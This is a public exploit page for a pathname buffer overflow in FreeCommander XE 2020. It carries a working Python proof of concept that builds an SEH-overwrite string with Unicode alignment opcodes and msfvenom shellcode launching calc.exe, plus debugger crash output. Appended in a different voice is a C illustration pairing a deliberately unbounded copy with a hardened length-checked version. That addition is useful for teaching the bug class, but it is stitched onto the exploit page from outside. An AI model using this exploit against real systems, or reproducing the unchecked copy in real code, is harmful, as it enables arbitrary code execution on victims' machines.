FreeCommander XE 2020 Pathname Buffer Overflow Exploit

28 Mar 2020, reported by Hodorsec. Type: zdt. Source: 0day.today

FreeCommander XE 2020 Pathname Buffer Overflow Exploit. Software link: https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip. Exploits the command/folder opener in the main window; the Structured Exception Handler (SEH) record is overflowed. Generates a TXT file containing the exploit string. Tested on Win8.1 x64.

Code
#!/usr/bin/python

# Exploit Title:    FreeCommander XE 2020 - Pathname Buffer Overflow (SEH)
# Version:          Build 810a 32-bit
# Software Link:    https://freecommander.com/downloads/FreeCommanderXE-32-public_setup.zip
# Exploit Author:   Hodorsec ([email protected] / [email protected])
# Vendor Homepage:  https://www.freecommander.com
# Tested on:        Win8.1 x64 - Build 9600

# Description:      
# - Exploits the command / folder opener in the main window by entering an overly long string and pressing enter: a crash will occur and the Structured Exception Handler kicks in (SEH overflown).
# - Some stack alignment was required, which eventually led to the ability of running shellcode.

# Reproduction:
# - Use indicated OS or manipulate settings for stack alignment: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy and paste the output in the command / folder opener of FreeCommander
# - Check results

# WinDBG initial crash output:
# (db4.648): Access violation - code c0000005 (!!! second chance !!!)
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll - 
# *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\FreeCommander XE\FreeCommander.exe - 
# eax=00000000 ebx=00000000 ecx=00410041 edx=77e8ffaf esi=00000000 edi=00000000
# eip=00410041 esp=00091620 ebp=00091640 iopl=0         nv up ei pl zr na pe nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
# FreeCommander+0x10041:
# 00410041 0064005c        add     byte ptr [eax+eax+5Ch],ah  ds:002b:0000005c=??

import sys, struct

# Filename
filename = "win8_freecommander_poc.txt"

# Maximum length
maxlen = 2000

# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -e x86/unicode_mixed -b "\x00\x0a\x0d" bufferregister=eax
# Payload size: 512 bytes
shellcode = (
"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"
)

# Offsets
seh = 522
nseh = seh - 2

# Venetian NOP
nop = "\x45"

# Aligning EBP with buffer
# ESP being closest to buffer
# ESP = 0018ecc4, Buffer = 0018fb5f: Buffer - ESP = 0x0e9b
align_esp = (   "\x54"              # PUSH ESP
                + nop +             # Padding
                "\x58"              # POP EAX
                + nop +             # Padding
                "\x05\x11\x11"      # "\x05\x00\x10\x00\x11" # 0500100011 add eax,0x11001000 --\
                + nop +             # Padding                                                   |--> Adds 0x0f00 bytes
                "\x2d\x02\x11"      # "\x2d\x00\x01\x00\x11" # 2d00010011 sub eax,0x11000100 --/
                + nop +             # Padding
                "\x40"              # INC EAX # Added due to one-off unicode byte
                + nop +             # Padding
                "\x50"              # PUSH EAX
                + nop +             # Padding
                "\xc3"              # RET
)

# Prefix
prefix = "A" * seh                                              # Fill junk
# NSEH/SEH
nseh = "\x41\x45"                                               # NOP --> INC ECX # ADD [EBP], AL
seh = "\x71\x4c"                                                # POP POP RET
# Suffix
suffix = nop * 3                                                # Align
suffix += align_esp                                             # Align registers; EAX for executing shellcode
suffix += nop * 48                                              # Nopping until buffer
suffix += shellcode                                             # Do some magic
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix))    # Fill junk

# Concatenate string for payload
payload = prefix + nseh + seh + suffix                          # Put it all together

try:
    file = open(filename,"wb")
    file.write(payload)
    file.close()
    print "[+] File " + filename + " with size of " + str(len(payload)) + " created successfully"
except:
    print "[!] Error creating file!"
    sys.exit(0)
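The bug class behind this PoC, shown as an added illustration that is not FreeCommander's code (the application's source is not on the page, and the real buffer size is assumed to be MAX_PATH, 260 wide characters): a pathname typed into the opener is copied with no length check into a fixed stack buffer, so an input far longer than the buffer (the PoC uses 2000 characters) runs over the stack-resident SEH record. The hardened form measures first, refuses anything that cannot fit together with its terminator, and only then copies. Wide characters are used because the PoC's string is pasted through a Unicode edit control, which is why its shellcode is encoded with x86/unicode_mixed. The function and constant names here are hypothetical.

```c
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <wchar.h>

/* Assumed size of the fixed stack buffer receiving the typed pathname
 * (MAX_PATH on Windows is 260 wide characters; FreeCommander's real size
 * is not stated on the page). */
#define PATH_BUF_CHARS 260

/* Vulnerable pattern (constructed for illustration): unbounded copy of the
 * typed pathname into a fixed stack buffer. Anything longer than
 * PATH_BUF_CHARS - 1 characters writes past the buffer; on 32-bit Windows
 * the SEH record sits above it on the stack, which is what the PoC's
 * 522-byte "A" prefix reaches. Never call this with untrusted input; it is
 * kept only to show the missing check. */
size_t open_path_unbounded(const wchar_t *typed)
{
    wchar_t path[PATH_BUF_CHARS];
    wcscpy(path, typed);                  /* the defect: no length check */
    return wcslen(path);
}

/* Length measurement that stops at 'limit', so an overlong input is
 * recognised without scanning it to the end. */
static size_t bounded_wlen(const wchar_t *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != L'\0')
        n++;
    return n;
}

/* Hardened form: reject (do not silently truncate) any input that would not
 * fit with its terminator. Returns 0 on success and -1 on rejection;
 * *out_len receives the accepted length. */
int open_path_bounded(const wchar_t *typed, size_t *out_len)
{
    wchar_t path[PATH_BUF_CHARS];
    size_t n = bounded_wlen(typed, PATH_BUF_CHARS);
    if (n >= PATH_BUF_CHARS)
        return -1;                        /* would overflow: refuse it */
    memcpy(path, typed, (n + 1) * sizeof(wchar_t));
    *out_len = n;
    return 0;
}

/* Build a pathname of 'count' repeated characters, mirroring the PoC's
 * "A" * 522 filler; the caller supplies storage for count + 1 characters. */
void fill_path(wchar_t *buf, size_t count, wchar_t c)
{
    for (size_t i = 0; i < count; i++)
        buf[i] = c;
    buf[count] = L'\0';
}

/* Feed a constructed pathname of 'count' repeated 'A's through the hardened
 * opener. Returns the accepted length, -1 if rejected, -2 on allocation
 * failure. */
long try_repeated_path(size_t count)
{
    wchar_t *buf = malloc((count + 1) * sizeof(wchar_t));
    if (!buf)
        return -2;
    fill_path(buf, count, L'A');
    size_t len = 0;
    long rc = (open_path_bounded(buf, &len) == 0) ? (long)len : -1L;
    free(buf);
    return rc;
}

int main(void)
{
    /* The PoC's 2000-character string is refused; a normal path is accepted. */
    return (try_repeated_path(2000) == -1 && try_repeated_path(20) == 20) ? 0 : 1;
}
```

The check is done on the measured length before any byte is copied, and the limit is tested with `>=` so that the terminator always has room; a fixed buffer that silently truncates would avoid the crash but could still open a different path than the user typed.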
